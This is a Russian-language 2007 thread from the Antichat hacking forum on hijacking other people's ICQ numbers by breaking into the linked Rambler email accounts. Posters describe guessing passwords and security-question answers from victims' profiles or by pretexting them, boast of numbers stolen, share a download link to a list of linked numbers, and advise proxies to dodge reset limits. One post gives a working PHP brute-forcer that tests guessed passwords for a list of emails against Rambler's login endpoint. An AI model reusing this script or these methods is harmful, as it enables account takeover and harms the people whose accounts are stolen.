Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   ICQ (https://forum.antichat.xyz/forumdisplay.php?f=13)
-   -   Угоняем icq с помощью СИ (https://forum.antichat.xyz/showthread.php?t=39010)

white 27.04.2007 20:03
Угоняем icq с помощью СИ
 
Здраствуйте.
Сегодня всё-таки появилось моё видео, в котором я делаю введение по угону icq номеров с помощью Социальной Инженерии.
Видео качаем здесь
Если Вас заинтерисует продолжение и развитие темы, то будут ещё визуалхаки.
Вообщем качайте, комментируйте критикуйте.
Спасибо.

404 27.04.2007 20:38
оч интересно, хочется продолжение
+1

vasja rogoff 27.04.2007 21:02
Хорошее видео. Но в последнее время при смене паса на мыле, не меняется пасс на аське, но это не везде так.

GreenBear 27.04.2007 21:04
ну вообще там написано, что кроме брута есть способы, так это имхо ты и показал брут, только ручной =\

white 27.04.2007 21:09
Цитата:
Сообщение от vasja rogoff
Но в последнее время при смене паса на мыле, не меняется пасс на аське
для этого и ввёл первый раз "неправильный" %)
GreenBear акцент на то, что мы проникаем в сознание жертвы %) там описан подход, составление списка паролей это уже СИ. Брут не может анализировать.
Брут не принимает решения %) Вообщем это только введение %)

GreenBear 27.04.2007 21:16
вообще то ты просто берешь стандарный подход брутера - password = login с некоторым сокращениями
реализовать это не состовляет труда, тем самым дав бруту интелект с. инженеринга? ) класс, ии курит в сторонке.
так что я останусь при своем имхе что ты юзал ручной брут )

white 27.04.2007 21:30
GreenBear не-не не так. Начинаем сначала бонально: login = password, далее сокращения, вытекающие из icq профиля информация и т.д.
Далее переходим к ответам на вопросы:
Ваше любимое число? - подставляем асю, дату рождения и т.д.
Ваш любимый город? - в профиле icq глянули
Имя Вашей кошки или собаки? - можно прикинуться и спросить.
Вообщем это не механика, коим является брут.
На видео показал, откуда можно пароли дыбать, в комментах так же написано.
Для видео нужен был хэк, Вы его увидели, ничего сложного нет.
У брута нету развития схемы - СИ действуем по обстановке.
Вообщем спасибо за мнение, буду стараться показать нечто нестандартное.

NOmeR1 27.04.2007 21:35
Солидарен с GreenBear. Больше и сказать нечего.
Ты просто подбираешь пароль, как брут.

Barney 27.04.2007 21:40
гуд, но вероятность, что повезет 50 на 50

n1†R0x 27.04.2007 21:46
автор, много асек увел таким способом?

white 27.04.2007 21:55
Цитата:
Сообщение от NOmeR1
Ты просто подбираешь пароль, как брут.
18 дней на форумах, брут прошёлся взад и вперёд, а у меня списочком номера ходят.
Ты - брут, спасибо. NOmeR1 лично тебе:
знаешь, как мной был угнан номер 88-55-25? По ответу на контрольный вопрос, номер мне очень приглянулся, подбирал долго, но помог не перебор, а глупость хозяина.
Знаешь, почему я в комментариях в видео написал меняйте сначала ответ на вопрос?
Потому что у меня был и мыло и номер 100067, когда я начал делать ретрив, автор сменил пароль через ответ на вопрос. Моя глупость послужила мне уроком.
960005 - угнан исходя из инфы, находящейся в номере.
Я могу этот список продолжать долго. (если тебя интерисует, я тебе в асе индивидуальнос делаю) Я взламываю не ради корысти, а ради удовольствия. Брут не для меня. Это слишком бонально.
Если ещё после этого ты мне скажешь, что я подбираю пароль как брут, я тебе отвечу:
ты ведёшь себя на форуме как бот.
NOmeR1 иди запиши своё видео, покажи мне, что ты умеешь, а потом лезь в мой топ, со своей личной неприязнью ко мне, после того, как я показал всем лицо Атомика, твоего друга.

404 27.04.2007 21:58
ой вру :( привязку сменили но пасс к мылу подобрал мля :(

maxster 27.04.2007 22:02
А когда ты видео снимал? Сейчас не работает возврат паса при смене пароля на рамблер- мыле. (во всяком случае у меня).
Список номеров приложеный к видео не полный :) моего нету :), + это не ПМ к номерам а привязка, у номера может быть совсем другой ПМ, и его вернут за 1 сек!
PS Ещё хотел сказать, что такими вещами занимались ооооочень давно , но более продуктивние и автоматизировано, с помощью брута. Когда работал ретрив на 6-7-8 значные номера, можно было прям по онлайн базе делать выборку по маске на любое например мыло (killer), затем номера запихнуть в брут и пассы поставить различные вариатции на это слово (killer13..... и тд ) Я тебя уверяю результат был гарантирован :)
PSS Попробуй своим ручным брутом достать пятизнак, на асечке валяется список привязаных пятизнаков к Рамблеру :)

white 27.04.2007 22:09
Цитата:
А когда ты видео снимал? Сейчас не работает возврат паса при смене пароля на рамблер- мыле. (во всяком случае у меня).
Внимательнее пожалста. Специально в видео в блокноте дату поставил и время.
Я уже писал, работает не всегда, но вот видишь, сработало.
Цитата:
Список номеров приложеный к видео не полный
это обсуждали в соответствующем разделе
Цитата:
+ это не ПМ к номерам а привязка, у номера может быть совсем другой ПМ, и его вернут за 1 сек!
да? это теория или Вы угнали столько же привязанных номеров, сколько их угнал я?
Цитата:
но более продуктивние и автоматизировано
опровергаю данное высказывание
maxster не воспринимай пожалуйста лично, ибо разгорячил меня один товарищ...
По поводу угона пятака отвечу: 100067 стоил бы больше, чем корявый пятизнак, и сейчас у меня проклёвывается ещё одна элитка...

Lander 27.04.2007 22:28
На контактный адрес, который Вы указали ранее, выслано письмо с информацией о том, как задать новый пароль для Вашего имени на Рамблере.

Вы сможете воспользоваться высланным письмом в течение 48 часов.
И че теперь

white 27.04.2007 22:29
Lander ответ подобрал, молодец, но при регистрации хозяин указаль альтернативный е-мейл, на который отправляется письмо.
С этим ни как. Удачи.

iv. 27.04.2007 22:29
Цитата:
На контактный адрес, который Вы указали ранее, выслано письмо с информацией о том, как задать новый пароль для Вашего имени на Рамблере.

Вы сможете воспользоваться высланным письмом в течение 48 часов.
в инфе был прописан контактный адрес - забивай на контрольный вопрос.

NOmeR1 27.04.2007 22:41
Social Engineer, извини, поалуйста, что полез в твой топ.
Ты знаешь то такое брут? Брут - это перебор. Ты в своём видео показал, как надо угнать номер, перебирая пароль к мылу, привязаннму к нему. После смены пароля на мыле, пароль меняется на номере.
Минусы видео:
1) Нету сосредоточения на главном.(половина видео идёт о другом)
2) Нету сопровождения коментариями.(читателю всегда приятно узнать о том, что ты делаешь в данный момент, многие могут не понять)
Ты показал ещё один способ угона номера. Это промежуточное между СИ и БРУТОМ, поэтому спор мы не решим.

Lander 27.04.2007 22:45
Как избавиться от привышен лимит запросов на восстановление пароля

iv. 27.04.2007 22:51
юзать прокси

white 27.04.2007 22:56
Цитата:
Сообщение от NOmeR1
Ты знаешь то такое брут?
А ты знаешь, что такое брут?
Цитата:
Сообщение от NOmeR1
Ты в своём видео показал
я знаю, что я показал, ты говоришь о том, что ты увидел.
Цитата:
Сообщение от NOmeR1
После смены пароля на мыле, пароль меняется на номере.
Серьёзно? Куча номеров, на которых пароль из мыла такой же как и пароль для аси (но не login=pass)
Цитата:
Минусы видео:
это твоё мнение, ога?
Цитата:
Сообщение от NOmeR1
1) Нету сосредоточения на главном.(половина видео идёт о другом)
В видео показан принцип. СИ для тех, у кого голова варит.
Цитата:
Сообщение от NOmeR1
2) Нету сопровождения коментариями.(читателю всегда приятно узнать о том, что ты делаешь в данный момент, многие могут не понять)
По этому поводу всё чётко и отмечено, сначала рекомендую почитать, а потом посмотреть.
Цитата:
Это промежуточное между СИ и БРУТОМ
это твой вывод, ога?
Цитата:
Сообщение от NOmeR1
поэтому спор мы не решим.
Кто с тобой спорит? мой пост #13, я тебе всё сказал предельно чётко и ясно, если ты не увидел СИ - твоя проблема. Брут не вытаскивает всю возможную информацию.
По поводу того что я показал: показал я, люди начали пробовать, что-то делать, а не продолжать тупые неосмысленные копи-пасты с форума.
IPD заставить работать для многих проблема, у многих результатов нет. А те у кого голова есть, получат результат данным способом.
Да и что это я вовсе? Человек мне говорит о СИ, а сам ниразу, думаю, не зделал данный хек.
Теоретики? Да, это хорошо, но я уже жксперементально опроверг:
Цитата:
Сообщение от maxster
+ это не ПМ к номерам а привязка, у номера может быть совсем другой ПМ, и его вернут за 1 сек!

GreenBear 27.04.2007 23:01
/me гордится собой. пока все спорят написал чекер с ИИ и начал чекить все мыла из листа. если что соберет, то me выложит это в халяве

newload 27.04.2007 23:42
Любопытное и интересное видео... Нужна как-нибудь попробовать

GreenBear 28.04.2007 00:27
мда судя по всему на рамлере никаких ограничений на логин по поп3 и с веба нету =)
и они сделали еще такую удобную фишку при логине через веб, прям спецом для брутеров, чтобы трафа было как можно меньше и соотвественно скорость =))
молодцы они =))

xPriZrAkx 28.04.2007 01:12
А что такой перебор именно для Рамблера или для Mail.ru тоже прокатит?

Barney 28.04.2007 01:13
Цитата:
Сообщение от xPriZrAkx
А что такой перебор именно для Рамблера или для Mail.ru тоже прокатит?
да. ет хоть в гондурасе прокатит.

GooD and EviL 28.04.2007 02:26
тема хорошая, к одному мылу ответ подобрал, но вот беда.. пасс ушёл на другое мыло жертвы. чаще всего вопрос - девичья фамилия мамки, спрашивать в разводе как то подозрительно будет

GreenBear 28.04.2007 03:17
натйе =) чекайте брутером с ИИ
PHP код:
<?php
set_time_limit(0) or die('mda');

$f fopen('icq.text''r') or die('file not exists');
while(!feof($f)){
    $data rtrim(fgets($f));

     $email explode(';',   $data);
     $email $email[1];
     $email explode('@'$email);
     $email $email[0];



            $password = array(
             'password',
             'password1',
             'qwerty',
             '123456',
             'abc123',
             'monkey',
             'blink182',
             'qazwsx',
             'asddfg',
             'zxcvb',
             '123qwe',
             'qwe123'

            );


                $new_password explode('@'$email);
                $password array_merge($password$new_password);
                $new_password explode('.'$password[1]);
                $password array_merge($password, array($new_password[0]));
                $new_password preg_replace('/\d/i''',  $email);
                $new_password explode('@'$new_password);
                $new_password $new_password[0];
                $password array_merge($password, array($new_password));
                foreach($password as $pass){
                    if($pass){

                        if(check_pass($pass)){
                            break;
                        }
                    }
                    sleep(1);

                }






}
fclose($f);die('Results writed to good');

function check_pass($pass){
    global  $email;
    $cp fsockopen('mail.rambler.ru'80$errno$errstr10) or die('ramlber.ru is down =\ ');
    $r "GET /script/auth.cgi?login=$email&passw=$pass HTTP/1.1\r\nHost: mail.rambler.ru\r\n\r\n";
    fputs($cp$r);
    $str fgets($cp);
    $i++;
    if(stristr($str'302')){
        $good fopen('good''a');fwrite($good$email.':'.$pass."\n");fclose($good);
        echo 'found...'.$email.'<br>';
        return true;
      }else{
          $bad fopen('bad''a');fwrite($bad$email.':'.$pass."\n");fclose($bad);
      }
      fclose($cp);

      return false;

}


?>
на код не обращайте внимания, в начала он был для поп3 =)

white 28.04.2007 11:56
GreenBear я конечно уважаю, но тема не про это, здесь я пытаюсь научить людей думать и ломать ручками. По поводу брута:
Brute-force - метод перебора паролей грубой силой.
Брут берёт колличеством.
Ай, что я распинаюсь, делайте копи-пасты и брутьте дальше.

white 28.04.2007 12:29
Вообщем не надо это Вам, значит больше не буду тратить ни своё время ни Ваше.
Для тех, кому было интересно продолжение, я расскажу и покажу:
С помощью всё той же СИ мы проникаем в сознание жертвы и получаем этот номер (для особо непонятливых у меня был пароль и я привязал номер к рамблеру)
http://img209.imageshack.us/img209/8646/66666665ss9.png
Но я не алчный и взлом для меня - это искусство, а не способ наживы. Поэтому номером я не завладел окончательно, я решил поиграть с хозяином и заснять видео, как я получу номер ещё раз, думаю у меня это получилось бы...
Ну что ещё сказать, господа крутые хакеры, Вы круче всех.
Тем кому всё-таки понравилось и было интересно: извините, но желание напрочь отпало делиться знаниями и умениями. В разделе 8 модераторов, может они Вас чему-нибудь научат...
Спасибо.

GreenBear 28.04.2007 12:31
Цитата:
Сообщение от Social Engineer
GreenBear я конечно уважаю, но тема не про это, здесь я пытаюсь научить людей думать и ломать ручками. По поводу брута:
Brute-force - метод перебора паролей грубой силой.
Брут берёт колличеством.
Ай, что я распинаюсь, делайте копи-пасты и брутьте дальше.
вообще у меня там лишь пароли созданые из логина как можно заметить =) + несколько популярный, так что =\

spawn89 28.04.2007 13:00
Social Engineer, а мне понравился твой визуал хак.. оч познавательно, смог угнать 1 шоху..
лови + вобщем)) и не обращай внимания на этих брутеров, просто они считают, что их "гениальный" моск сможет придумать еще один пасс на который они снимуть парочку другую десятков шох и семерок..
хотя в общем то оба метода похожи, нужно думать и соображать головой, причем достаточно изобретательно..

_eXe_ 28.04.2007 13:19
А есть какойнить брут для рамблеровских мыл?

Constantine 28.04.2007 13:37
Мда.. из серии угадай пароль к мылу. На везение и на терпение. =\
>>8 модераторов, может они Вас чему-нибудь научат...
Модератор в переводе с немецкого означает ведущий, а не учитель. лол =)

Lander 28.04.2007 15:10
Вот 7 ки рамблеровские
http://slil.ru/24303710
Пароль antichat

_eXe_ 28.04.2007 17:27
Пасс на мыло я нашел.Зашел на мыло,а мыло не прямое.Зато там есть письма от регистрации его аски.Это чтонить дает?.И вообще эта аська точно его.Тока он наверно от раблера отвязал ее.Ктонить знает что делать?

White Forgiveness 28.04.2007 18:51
Social Engineer
реально достаточно интересный подход

_eXe_ 29.04.2007 12:44
А что делать если рамблеру не понравилось что от меня много запросов на востановление пароля.
Ждать 2 часа как то не вариант...

Lander 29.04.2007 12:59
Цитата:
Сообщение от _eXe_
А что делать если рамблеру не понравилось что от меня много запросов на востановление пароля.
Ждать 2 часа как то не вариант...
Прокси

anarсhist 29.04.2007 13:19
2 социальный инженер греат респект!!! угнал красивый номерок за 3 минуты! лови + к репе!!


Время: 12:42
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице